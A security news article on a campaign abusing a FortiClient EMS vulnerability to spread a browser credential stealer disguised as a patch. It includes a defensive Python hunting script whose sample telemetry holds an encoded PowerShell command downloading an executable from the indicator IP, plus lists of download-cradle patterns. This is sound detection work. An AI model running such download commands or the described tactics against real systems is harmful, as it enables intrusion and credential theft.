FortiClient EMS Vulnerability Used to Spread Malware Across Enterprise Networks


Cybersecurity researchers have warned that threat actors are actively exploiting a critical vulnerability in Fortinet’s FortiClient Endpoint Management Server (EMS) to deploy dangerous credential-stealing malware on managed devices.

The attackers are abusing trusted enterprise management systems to distribute malware that appears to be a legitimate Fortinet software update. Security experts say the campaign allows cybercriminals to silently infect multiple devices within an organization using the company’s own endpoint management infrastructure.

The vulnerability, tracked as CVE-2026-35616, has a critical CVSS score of 9.1. According to cybersecurity company Arctic Wolf, the flaw is a pre-authentication API access bypass vulnerability that can lead to privilege escalation.

Fortinet has already released patches for the issue in FortiClient EMS version 7.4.7 and later. However, organizations that have not updated their systems remain vulnerable to attacks.

Cybersecurity experts observed the malicious campaign in May 2026. Attackers exploited the flaw to gain unauthorized access to FortiClient EMS environments and modify endpoint management settings.

Researchers said the attackers used FortiClient’s own management capabilities to execute malicious PowerShell commands across managed endpoints. Because the commands were delivered through a trusted enterprise management system, the activity appeared similar to legitimate administrative operations.

Arctic Wolf explained that once the attackers gained access to EMS management functionality, every connected endpoint became a potential target. This eliminated the need to compromise devices individually.

The threat actors also changed several EMS configurations to avoid detection. These modifications included delaying firmware upgrade reminders and altering Remote Access Profile settings. They additionally modified endpoint policies to insert malicious scripts that would run automatically on managed devices.

This technique allowed the attackers to quietly spread malware across enterprise environments while blending in with normal system management activities.

One of the most dangerous aspects of the campaign is the use of a fake update executable named “FortiEndpoint_Patch.exe.” The file pretends to be an official Fortinet endpoint update, but it is actually a previously undocumented Windows information stealer.

The malware is capable of stealing a wide range of sensitive information from infected systems, including:

  • Saved passwords
  • Browser cookies
  • Autofill information
  • Credit card details
  • Stored addresses
  • Phone numbers

Researchers said the malware targets both Chromium-based browsers, such as Google Chrome and Microsoft Edge, and Gecko-based browsers like Mozilla Firefox.

The stolen data is collected and stored in log files within the Windows ProgramData directory before being transmitted to attacker-controlled infrastructure.


The attack also abuses a legitimate FortiClient executable called “fortitray.exe.” Attackers used this trusted file to launch a malicious .cmd script through Windows cmd.exe.

The .cmd script then executed a Base64-encoded PowerShell command designed to download and run the credential-stealing payload.

After collecting sensitive information from the victim’s device, the PowerShell script sent the data to an attacker-controlled IP address, identified as 83.138.53[.]110, using an HTTP POST request.

Interestingly, researchers noted that the information-stealing malware itself does not contain built-in network exfiltration functionality. Instead, the PowerShell script handles the communication with the attacker’s infrastructure.

This modular approach helps the attackers remain stealthy and avoid detection by traditional security tools.

Security experts warn that the stolen credentials and session cookies could give attackers access to additional enterprise systems and cloud services.

In some cases, attackers may even bypass multi-factor authentication (MFA) protections by reusing stolen session cookies. This could allow unauthorized access to internal applications, email accounts, SaaS platforms, and other sensitive business resources.

Arctic Wolf stated that the attack demonstrates how dangerous it can be when attackers compromise centralized management platforms.

By exploiting the FortiClient EMS vulnerability, cybercriminals gained the ability to distribute malicious scripts to all managed endpoints from a single location. This significantly increased the scale and impact of the attack.

Cybersecurity teams are strongly advised to immediately update FortiClient EMS installations to version 7.4.7 or newer to close the vulnerability.

Organizations should also:

  • Review EMS configuration changes for suspicious activity
  • Monitor PowerShell execution logs
  • Inspect endpoint policies for unauthorized scripts
  • Hunt for indicators of compromise linked to the campaign
  • Reset credentials and invalidate session cookies if compromise is suspected
  • Enable advanced endpoint detection and response solutions
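The execution chain described above (fortitray.exe launching cmd.exe, a Base64-encoded PowerShell command that downloads the payload, an HTTP POST to 83.138.53[.]110, and the fake FortiEndpoint_Patch.exe) and the "monitor PowerShell execution logs / hunt for indicators" items in the checklist can be turned into a concrete hunt. The script below is an added example, not code from Arctic Wolf or Fortinet. It assumes a Sysmon-style JSON-lines telemetry format (event, image, parent_image, command_line, dest_ip) that is hypothetical, and the log records it scans are constructed here to exercise each detection; the only values taken from the article are the IP, the executable names, and the ProgramData location.

```python
"""Hunt endpoint telemetry for the observable chain of the FortiClient EMS
campaign: fortitray.exe -> cmd.exe -> encoded PowerShell download -> HTTP
traffic to the IoC IP -> launch of the fake FortiEndpoint_Patch.exe.
Added example; the JSON-lines log shape is a hypothetical Sysmon-like format."""
import base64
import json
import re

IOC_IP = "83.138.53.110"           # from the article, defanged there as 83.138.53[.]110
IOC_FILE = "fortiendpoint_patch.exe"
# Common PowerShell download primitives; a hit means "review", not "confirmed malicious".
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "start-bitstransfer")
# -e/-ec/-enc/-EncodedCommand followed by a base64 blob (the whitespace stops
# "-ExecutionPolicy" from matching as "-e").
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return a list of finding strings for one event dict (empty if benign)."""
    findings = []
    if ev.get("event") == "process_create":
        image = ev.get("image", "").lower()
        parent = ev.get("parent_image", "").lower()
        if parent.endswith("fortitray.exe") and image.endswith("cmd.exe"):
            findings.append("fortitray.exe spawned cmd.exe")
        if image.endswith(IOC_FILE):
            findings.append("fake update executable launched")
        if image.endswith("powershell.exe"):
            decoded = decode_encoded_command(ev.get("command_line", ""))
            if decoded is not None:
                findings.append("encoded PowerShell command")
                low = decoded.lower()
                if any(h in low for h in DOWNLOAD_HINTS):
                    findings.append("decoded command contains download cradle")
                if IOC_IP in low:
                    findings.append("decoded command references IoC IP")
    elif ev.get("event") == "network_connect" and ev.get("dest_ip") == IOC_IP:
        findings.append("connection to IoC IP")
    return findings


def hunt(lines):
    """Scan JSON log lines; return {record id: [findings]} for records that hit."""
    hits = {}
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        found = analyze_event(ev)
        if found:
            hits[ev["id"]] = found
    return hits


def _encode_ps(script):
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry: records 1-4 mirror the reported chain, 5-6 are benign.
_SAMPLE_SCRIPT = ("$p = Join-Path $env:ProgramData 'FortiEndpoint_Patch.exe'; "
                  f"Invoke-WebRequest -Uri http://{IOC_IP}/update -OutFile $p")
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"id": 1, "event": "process_create", "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"id": 2, "event": "process_create", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -EncodedCommand {_encode_ps(_SAMPLE_SCRIPT)}"},
    {"id": 3, "event": "network_connect", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_ip": IOC_IP, "dest_port": 80},
    {"id": 4, "event": "process_create", "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\ProgramData\FortiEndpoint_Patch.exe", "command_line": "FortiEndpoint_Patch.exe"},
    {"id": 5, "event": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"id": 6, "event": "network_connect", "image": r"C:\Windows\System32\svchost.exe",
     "dest_ip": "10.0.0.5", "dest_port": 443},
])

if __name__ == "__main__":
    for rec_id, found in hunt(SAMPLE_LOG.splitlines()).items():
        print(rec_id, "; ".join(found))
```

Running it flags records 1 through 4 and stays silent on the benign PowerShell script and the unrelated connection. The encoded-command decoder is the piece worth keeping in a real pipeline: it reverses the UTF-16LE Base64 wrapping so the download cradle and the IoC address become string-searchable, which is exactly what the reported `.cmd`-to-PowerShell hop hides from naive command-line matching.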

Security teams should pay special attention to unusual use of legitimate administrative tools, as attackers increasingly rely on trusted software and living-off-the-land techniques to avoid detection.

The FortiClient EMS attacks highlight a growing cybersecurity trend where threat actors target enterprise management systems to maximize the reach of their malware campaigns.

Instead of compromising individual endpoints one by one, attackers focus on centralized management servers that already have trusted access to thousands of devices inside corporate networks.

This strategy allows cybercriminals to deploy malware quickly, efficiently, and with a lower chance of being detected.

As cyber threats continue to evolve, organizations must ensure that critical infrastructure platforms are regularly patched, monitored, and secured against unauthorized access.

Failing to apply security updates in time can leave businesses exposed to devastating credential theft attacks and large-scale network compromise.
